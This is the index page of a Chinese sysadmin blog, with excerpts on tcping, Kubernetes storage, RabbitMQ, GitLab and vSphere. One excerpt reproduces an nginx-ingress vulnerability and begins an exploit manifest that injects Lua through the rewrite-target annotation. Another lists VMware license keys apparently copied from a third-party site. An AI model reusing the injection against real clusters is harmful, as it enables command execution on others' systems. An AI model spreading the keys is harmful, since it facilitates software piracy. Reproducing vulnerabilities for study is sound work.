Myluzh Blog

Strive to become a dream architect.

Linux安装tcping

2023-11-20 myluzh Linux

0x01 安装依赖 # CentOS yum install -y tcptraceroute bc # Debian/Ubuntu apt-get install -y tcptraceroute bc 0x02 安装tcping vim tcping #!/bin/sh # # tcpping: test response times using TCP SYN packets # URL: http://www.vdberg.org/~richard/tcpping.html # uses tcptraceroute from http://michael.toren.net/code/tcptraceroute/ # (c) 2002-2005 Richard van den Berg <richard@vdberg.org> under the GPL # 2008/02/10 v1.7 make -C work when reverse lookup fails, courtesy of Fabrice Le Dorze <Fabrice.LeDorze@apx.fr> ver="v1...

阅读全文>>

标签: centos tcping

评论(0) (66)

关于K8S nginx-ingress组件任意写入配置进行命令执行漏洞的复现与研究

2023-11-16 myluzh Kubernetes

0x01 开头 这里的ingress一定要是nginx,进行复现的环境k8s版本是1.25,ingress里面参数nginx.ingress.kubernetes.io/rewrite-target,可以任意插入,就尝试插入 lua 代码通过注解注入特殊字符尝试闭合nginx配置文件块从而实现插入任意配置实现命令执行。 0x02 复现 1、exp-ingress.yaml如下 apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: ingress-exploit annotations: kubernetes.io/ingress.class: "nginx" nginx.ingress.kubernetes.io/rewrite-target: | execute-command/ last; } location execute-command/ { content_by_lua_block { local handle =...

阅读全文>>

标签: k8s nginx Ingress exp

评论(0) (52)

K8S部署nfs-client-provisioner实现PV自动供给

2023-11-9 myluzh Kubernetes

0x00 介绍 1、nfs-client-provisioner 在Kubernetes中,一个PersistentVolume(PV)只能绑定到一个PersistentVolumeClaim(PVC)。PV和PVC之间是一对一的关系,每个PVC只能绑定到一个PV。 使用支持动态PV和PVC创建的存储插件(如nfs-client-provisioner),您可以为每个PVC动态创建一个独立的PV。这样,每个PVC都有自己的PV,但它们可以共享相同的存储资源。 2、StorageClass StorageClass充当PV和PVC之间的中间层,它定义了如何动态创建PersistentVolume(PV)。当您创建一个PVC并指定一个StorageClass时,Kubernetes会根据该StorageClass的定义自动创建一个符合要求的PV来满足PVC的需求。可以将StorageClass理解为一种存储资源的池。当您创建一个PVC并指定了某个StorageClass时,Kubernetes会根据该StorageClass的定义来动态创建一个PV,并将其绑定到该PV...

阅读全文>>

标签: k8s nfs pv pvc nfs-client-provisioner storageclass

评论(0) (274)

定制RabbitMQ镜像+在K8S集群中部署单节点&多节点RabbitMQ

2023-11-9 myluzh Kubernetes

0x01 定制RabbitMQ镜像 本文章基于DockerHub镜像rabbitmq:3.12.8-management,由于官方镜像没有集成有些插件,需要在镜像中安装插件并重新打包。 rabbitmq_delayed_message_exchange延迟队列插件的安装,rabbitmq 插件下载(官网):https://www.rabbitmq.com/community-plugins.html【根据rabbitmq版本选择对应的插件,web管理页面首页可以查看rabbitmq版本】,手动安装插件教程参考:https://blog.csdn.net/user2025/article/details/105620908 下载完成rabbitmq_delayed_message_exchange-3.12.0.ez后,放到跟dockerfile同一目录,然后使用docker build进行打包。 DockerFile如下: FROM rabbitmq:3.12.8-management ADD ./rabbitmq_delayed_message_exchange-3.12.0.ez /pl...

阅读全文>>

标签: docker k8s dockerfile rabbitmq

评论(0) (128)

Docker部署GitLab-CE

2023-11-8 myluzh Docker

0x01 docker部署 docker run -d \ --name gitlab \ -p 9443:443 \ -p 9999:80 \ -p 9998:22 \ -v /etc/gitlab:/etc/gitlab \ -v /var/log/gitlab:/var/log/gitlab \ -v /var/opt/gitlab:/var/opt/gitlab \ -v /etc/localtime:/etc/localtime \ --privileged=true \ gitlab/gitlab-ce:latest 访问地址:http://IP:9999  首次登陆页面的账号是root,密码则是临时密码,保存在/etc/gitlab/initial_root_password中,初始密码保存24小时,自动删除,首次登陆后需要修改密码操作。 0x02 配置ssh秘钥 SSH密钥用于在您的电脑和GitLab建立安全连接。 SSH 指纹验证客户端是否连接到正确的主机。 # 在本地计算机上生成了SSH密钥对,请将 "your_ema...

阅读全文>>

标签: docker gitlib git

评论(0) (92)

VMware vSphere vCenter 8.0 许可证

2023-11-8 myluzh VMware

0x01 vSphere 8的新增功能 VMware vSphere 8是一个企业工作负载平台,它为本地工作负载带来了云的好处。它通过基于DPU和GPU的加速增强了性能,通过VMware云控制台提高了运营效率,与附加混合云服务无缝集成,并通过与VM一起运行容器的企业级集成Kubernetes运行时加速了创新。 0x02 许可注册 vSphere Enterprise Plus: HG00K-03H8K-48929-8K1NP-3LUJ4 4F40H-4ML1K-M89U0-0C2N4-1AKL4 vCenter Standard : 4F282-0MLD2-M8869-T89G0-CF240 0F41K-0MJ4H-M88U1-0C3N0-0A214 来源于:https://technet24.ir/vmware-vsphere-8-26918

阅读全文>>

标签: vmware vSphere 许可证

评论(0) (61)